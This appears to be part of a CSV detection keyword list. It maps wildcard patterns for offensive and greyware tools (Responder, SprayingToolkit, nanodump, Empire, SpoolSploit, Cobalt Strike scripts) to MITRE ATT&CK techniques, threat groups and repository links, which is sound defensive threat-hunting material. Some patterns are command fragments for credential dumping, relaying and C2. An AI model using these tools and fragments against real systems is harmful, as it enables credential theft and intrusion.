+"*SpiderLabs/DoHC2*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z"
+"*SpiderLabs/Responder*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4199","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z"
+"*spindrift.py *--target *","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","10","10","1352","268","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z"
+"*spindrift.py --domain*","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. 
less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","10","10","1352","268","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z"
+"*SplashtopStreamer3500.exe* prevercheck *","greyware_tool_keyword","Splashtop","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","N/A","RMM","https://thedfirreport.com/2023/09/25/from-screenconnect-to-hive-ransomware-in-61-hours/","1","0","N/A","10","10","N/A","N/A","N/A","N/A"
+"*sploitus.com/exploit?id=6C1081C5-7938-5E83-9079-719C1B071FB5*","offensive_tool_keyword","POC","Automated PoC exploitation of CVE-2021-44521","T1548 - T1190","TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/QHpix/CVE-2021-44521","1","1","N/A","N/A","1","9","2","2022-02-24T12:04:40Z","2022-02-24T11:07:34Z"
+"*splunk/upload_app_exec/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*splunk_whisperer.py*","offensive_tool_keyword","SplunkWhisperer2","Local privilege escalation or remote code execution through Splunk Universal Forwarder (UF) misconfigurations","T1068 - T1059.003 - T1071.001","TA0003 - TA0002 - TA0011","N/A","N/A","Lateral Movement - Privilege Escalation","https://github.com/cnotin/SplunkWhisperer2","1","1","N/A","9","3","239","53","2022-09-30T16:41:17Z","2019-02-24T18:05:51Z"
+"*splunk_whisperer-master*","offensive_tool_keyword","SplunkWhisperer2","Local privilege escalation or remote code execution through Splunk Universal Forwarder (UF) misconfigurations","T1068 - T1059.003 - T1071.001","TA0003 - TA0002 - TA0011","N/A","N/A","Lateral Movement - Privilege Escalation","https://github.com/cnotin/SplunkWhisperer2","1","1","N/A","9","3","239","53","2022-09-30T16:41:17Z","2019-02-24T18:05:51Z"
+"*SplunkWhisperer2-master*","offensive_tool_keyword","SplunkWhisperer2","Local privilege escalation or remote code execution through Splunk Universal Forwarder (UF) misconfigurations","T1068 - T1059.003 - T1071.001","TA0003 - TA0002 - TA0011","N/A","N/A","Lateral Movement - Privilege Escalation","https://github.com/cnotin/SplunkWhisperer2","1","1","N/A","9","3","239","53","2022-09-30T16:41:17Z","2019-02-24T18:05:51Z"
+"*-spn * -clsid * -shadowcred*","offensive_tool_keyword","KrbRelay","Relaying 3-headed dogs. 
More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html","T1212 - T1558 - T1550","TA0001 - TA0004 -TA0006","N/A","N/A","Exploitation tools","https://github.com/cube0x0/KrbRelay","1","0","N/A","N/A","8","751","109","2022-05-29T09:45:03Z","2022-02-14T08:21:57Z"
+"*spnroast_*.txt*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z"
+"*spoof_wani*","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","N/A","10","10","31","17","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z"
+"*spoof_wlan_creds*","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","N/A","10","10","31","17","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z"
+"*--spoof-callstack *","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z"
+"*SpooferHostsIgnore*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. 
the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*SpooferHostsReply*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*SpooferIP*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*SpooferIPsIgnore*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*SpooferIPsReply*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*SpooferLearningDelay*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*SpooferLearningInterval*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*SpooferRepeat*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*SPOOFING GROUP POLICY TEMPLATE LOCATION THROUGH gPCFileSysPath*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z"
+"*Spoofy/spoofy.py*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z"
+"*SpookFlare*","offensive_tool_keyword","SpookFlare","SpookFlare has a different perspective to 
bypass security measures and it gives you the opportunity to bypass the endpoint countermeasures at the client-side detection and network-side detection. SpookFlare is a loader/dropper generator for Meterpreter. Empire. Koadic etc. SpookFlare has obfuscation. encoding. run-time code compilation and character substitution features.","T1027 - T1029 - T1218 - T1112","TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hlldz/SpookFlare","1","0","N/A","N/A","10","925","201","2019-05-08T09:03:45Z","2017-11-13T17:22:12Z"
+"*spookflare.py*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z"
+"*spool_sploit.py*","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/BeetleChunks/SpoolSploit","1","1","N/A","N/A","6","533","90","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z"
+"*spooler_check*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
+"*SpoolSample.exe * *","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - 
T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","0","N/A","10","7","635","105","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z"
+"*SpoolSample_v4.5_x64.exe*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*SpoolSploit/*","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/BeetleChunks/SpoolSploit","1","1","N/A","N/A","6","533","90","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z"
+"*spoolsploit:latest*","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/BeetleChunks/SpoolSploit","1","1","N/A","N/A","6","533","90","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z"
+"*spoolss_##*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - 
T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z"
+"*spoolsystem inject*","offensive_tool_keyword","cobaltstrike","Spectrum Attack Simulation beacons","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/nccgroup/nccfsas/","1","0","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z"
+"*spoolsystem spawn*","offensive_tool_keyword","cobaltstrike","Spectrum Attack Simulation beacons","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas/","1","0","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z"
+"*spoolsystem.cna*","offensive_tool_keyword","cobaltstrike","Spectrum Attack Simulation beacons","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - 
T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas/","1","1","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z"
